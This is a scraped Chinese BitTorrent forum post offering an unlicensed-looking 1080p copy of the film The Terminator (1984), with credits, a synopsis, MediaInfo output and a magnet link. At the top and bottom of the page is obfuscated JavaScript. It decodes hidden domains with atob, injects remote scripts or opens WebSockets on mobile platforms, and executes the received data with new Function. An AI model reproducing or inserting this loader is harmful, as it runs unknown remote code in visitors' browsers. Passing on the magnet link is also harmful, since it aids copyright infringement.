终结者[中文字幕].The.Terminator.1984.1080p.BluRay.x265.10bit.DTS 7.85GB

版主小s 26天前 193

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 终结者 / 未来战士(港) / 魔鬼终结者(台) / 人魔大战

◎片 名 The Terminator

◎年 代 1984

◎产 地 美国 / 英国

◎类 别 动作 / 科幻 / 惊悚

◎语 言 英语 / 西班牙语

◎上映日期 1992-06(中国大陆) / 1984-10-26(美国)

◎IMDb链接 https://www.imdb.com/title/tt0088247/

◎豆瓣评分 8.2/10 (180930人评价)

◎豆瓣链接 https://movie.douban.com/subject/1300656/

◎片 长 107分钟

◎导 演 詹姆斯·卡梅隆 James Cameron (id:1022571)

◎编 剧 詹姆斯·卡梅隆 James Cameron (id:1022571)

盖尔·安妮·赫德 Gale Anne Hurd (id:1040812)

小威廉·威谢尔 William Wisher Jr. (id:1301118)

◎演 员 阿诺·施瓦辛格 Arnold Schwarzenegger (id:1035643)

迈克尔·比恩 Michael Biehn (id:1025190)

琳达·汉密尔顿 Linda Hamilton (id:1027821)

保罗·温菲尔德 Paul Winfield (id:1019128)

兰斯·亨利克森 Lance Henriksen (id:1048140)

里克·罗索维奇 Rick Rossovich (id:1055201)

贝丝·莫塔 Bess Motta (id:1136460)

阿尔·伯恩 Earl Boen (id:1061235)

迪克·米勒 Dick Miller (id:1016710)

弗兰科·哥伦布 Franco Columbu (id:1022963)

比尔·帕克斯顿 Bill Paxton (id:1048134)

布莱恩·汤普森 Brian Thompson (id:1049671)

小威廉·威谢尔 William Wisher Jr. (id:1301118)

菲利普·戈登 Philip Gordon (id:1285228)

哈丽特·梅丁 Harriet Medin (id:1126184)

玛丽安妮·穆勒雷尔 Marianne Muellerleile (id:1132232)

达雷尔·马普森 Darrell Mapson (id:1011099)

斯坦·耶尔 Stan Yale (id:1162834)

Norman Friedman Norman Friedman (id:1084876)

Barbara Powers Barbara Powers (id:1128347)

Chino 'Fats' Williams Chino 'Fats' Williams (id:1168641)

童自荣 Zirong Tong (id:1318216)

户田惠子 Keiko Toda (id:1051741)

约翰·戴利 John Daly (id:1069736)

布拉德·费德尔 Brad Fiedel (id:1032622)

亚当·格林伯格 Adam Greenberg (id:1276464)

马克·戈德布拉特 Mark Goldblatt (id:1285044)

斯坦·温斯顿 Stan Winston (id:1002831)

杰夫·道恩 Jeff Dawn (id:1281940)

Peter Tothpal Peter Tothpal (id:1276622)

贝齐·马格鲁德尔 Betsy Magruder (id:1290728)

小吉恩·沃伦 Gene Warren Jr. (id:1300455)

乔·威斯科西尔 Joe Viskocil (id:1300123)

Ted Rae Ted Rae (id:1295142)

Laurel Klick Laurel Klick (id:1288711)

Ernest D. Farino Ernest D. Farino (id:1283452)

Doug Beswick Doug Beswick (id:1278546)

◎标 签 科幻 / 施瓦辛格 / 动作 / 美国 / 经典 / 终结者 / 美国电影 / 1984

◎简 介

这是一个未来的世界,天下已经由机器人来操控。机器人想完全占有这个世界,把人类赶尽杀绝,然而却遇到了顽强抵抗的人类精英康纳。于是,终结者机器人T-800(阿诺?施瓦辛格 Arnold Schwarzenegger饰)受命回到1984年,杀害康纳母亲莎拉(琳达?汉密尔顿 Linda Hamilton 饰),目的是灭掉康纳的出生。 康纳得知后,火速派战士雷斯(迈克尔?比恩 Michael Biehn 饰)前往救援。雷斯来到1984年的洛杉矶,及时搭救了被机器人追杀的莎拉——她当时还是一个大学生。然而,人们把雷斯当成疯子,不相信未来机器人统治世界。 直到莎拉又一次遭到机器人追击,她才相信了这一切。奔走中她和雷斯相爱,怀上了未来的康纳,而雷斯也陷入和机器人的苦斗当中。人类世界能否从因为这场斗争改变原来的噩运?

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 173131543188306372955620490281031547842 (0x823FEC1E1C023B4A385658E90803BBC2)

  4. Complete name : [email protected].mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 7.85 GiB

  8. Duration : 1 h 47 min

  9. Overall bit rate : 10.5 Mb/s

  10. Movie name : The Terminator

  11. Encoded date : UTC 2021-10-25 04:33:06

  12. Writing application : mkvmerge v61.0.0 ('So') 64-bit

  13. Writing library : libebml v1.4.2 + libmatroska v1.6.4

  14. Cover : Yes

  15. Attachments : cover.jpg


  16. Video

  17. ID : 1

  18. Format : HEVC

  19. Format/Info : High Efficiency Video Coding

  20. Format profile : Main [email protected]@Main

  21. Codec ID : V_MPEGH/ISO/HEVC

  22. Duration : 1 h 47 min

  23. Bit rate : 8 928 kb/s

  24. Width : 1 920 pixels

  25. Height : 1 040 pixels

  26. Display aspect ratio : 1.85:1

  27. Frame rate mode : Constant

  28. Frame rate : 23.976 (24000/1001/53354) FPS

  29. Color space : YUV

  30. Chroma subsampling : 4:2:0

  31. Bit depth : 10 bits

  32. Bits/(Pixel*Frame) : 0.186

  33. Stream size : 6.69 GiB (85%)

  34. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  35. Encoding settings : rc=crf / crf=20.0000 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.90 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=5 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x1040 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  36. Default : Yes

  37. Forced : No


  38. Audio

  39. ID : 2

  40. Format : DTS

  41. Format/Info : Digital Theater Systems

  42. Codec ID : A_DTS

  43. Duration : 1 h 47 min

  44. Bit rate mode : Constant

  45. Bit rate : 1 509 kb/s

  46. Channel(s) : 6 channels

  47. Channel layout : C L R Ls Rs LFE

  48. Sampling rate : 48.0 kHz

  49. Frame rate : 93.750 FPS (512 SPF)

  50. Bit depth : 24 bits

  51. Compression mode : Lossy

  52. Stream size : 1.13 GiB (14%)

  53. Language : English

  54. Default : Yes

  55. Forced : No


  56. Text #1

  57. ID : 3

  58. Format : PGS

  59. Muxing mode : zlib

  60. Codec ID : S_HDMV/PGS

  61. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  62. Duration : 1 h 43 min

  63. Bit rate : 22.0 kb/s

  64. Count of elements : 1203

  65. Stream size : 16.3 MiB (0%)

  66. Title : 简英

  67. Language : Multiple languages

  68. Default : No

  69. Forced : No


  70. Text #2

  71. ID : 4

  72. Format : PGS

  73. Muxing mode : zlib

  74. Codec ID : S_HDMV/PGS

  75. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  76. Duration : 1 h 43 min

  77. Bit rate : 11.0 kb/s

  78. Count of elements : 1203

  79. Stream size : 8.17 MiB (0%)

  80. Title : 简中

  81. Language : Chinese

  82. Default : No

  83. Forced : No


  84. Text #3

  85. ID : 5

  86. Format : PGS

  87. Muxing mode : zlib

  88. Codec ID : S_HDMV/PGS

  89. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  90. Duration : 1 h 43 min

  91. Bit rate : 22.1 kb/s

  92. Count of elements : 1203

  93. Stream size : 16.4 MiB (0%)

  94. Title : 繁英

  95. Language : Multiple languages

  96. Default : No

  97. Forced : No


  98. Text #4

  99. ID : 6

  100. Format : PGS

  101. Muxing mode : zlib

  102. Codec ID : S_HDMV/PGS

  103. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  104. Duration : 1 h 43 min

  105. Bit rate : 11.2 kb/s

  106. Count of elements : 1203

  107. Stream size : 8.29 MiB (0%)

  108. Title : 繁中

  109. Default : No

  110. Forced : No


  111. Text #5

  112. ID : 7

  113. Format : PGS

  114. Muxing mode : zlib

  115. Codec ID : S_HDMV/PGS

  116. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  117. Duration : 1 h 43 min

  118. Bit rate : 12.6 kb/s

  119. Count of elements : 1160

  120. Stream size : 9.25 MiB (0%)

  121. Title : 英

  122. Language : English

  123. Default : No

  124. Forced : No


  125. Menu

  126. 00:00:00.000 : Chapter 01

  127. 00:03:32.253 : Chapter 02

  128. 00:05:18.151 : Chapter 03

  129. 00:11:38.322 : Chapter 04

  130. 00:13:45.324 : Chapter 05

  131. 00:15:11.827 : Chapter 06

  132. 00:16:31.615 : Chapter 07

  133. 00:20:44.618 : Chapter 08

  134. 00:22:49.618 : Chapter 09

  135. 00:29:49.787 : Chapter 10

  136. 00:33:15.034 : Chapter 11

  137. 00:38:47.116 : Chapter 12

  138. 00:41:25.191 : Chapter 13

  139. 00:47:46.488 : Chapter 14

  140. 00:50:39.995 : Chapter 15

  141. 00:54:41.569 : Chapter 16

  142. 00:59:04.916 : Chapter 17

  143. 01:03:53.538 : Chapter 18

  144. 01:09:35.546 : Chapter 19

  145. 01:14:08.986 : Chapter 20

  146. 01:15:00.078 : Chapter 21

  147. 01:17:18.800 : Chapter 22

  148. 01:18:30.372 : Chapter 23

  149. 01:23:00.892 : Chapter 24

  150. 01:26:24.721 : Chapter 25

  151. 01:30:22.583 : Chapter 26

  152. 01:32:19.367 : Chapter 27

  153. 01:35:52.121 : Chapter 28

  154. 01:39:53.862 : Chapter 29

  155. 01:40:18.721 : Chapter 30

  156. 01:40:49.334 : Chapter 31

  157. 01:43:12.895 : Chapter 32


TAGS 动作 惊悚 科幻

磁力链:
  • magnet:?xt=urn:btih:37456EC47660BA5E5E0480588AF84E97D0B107F2

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};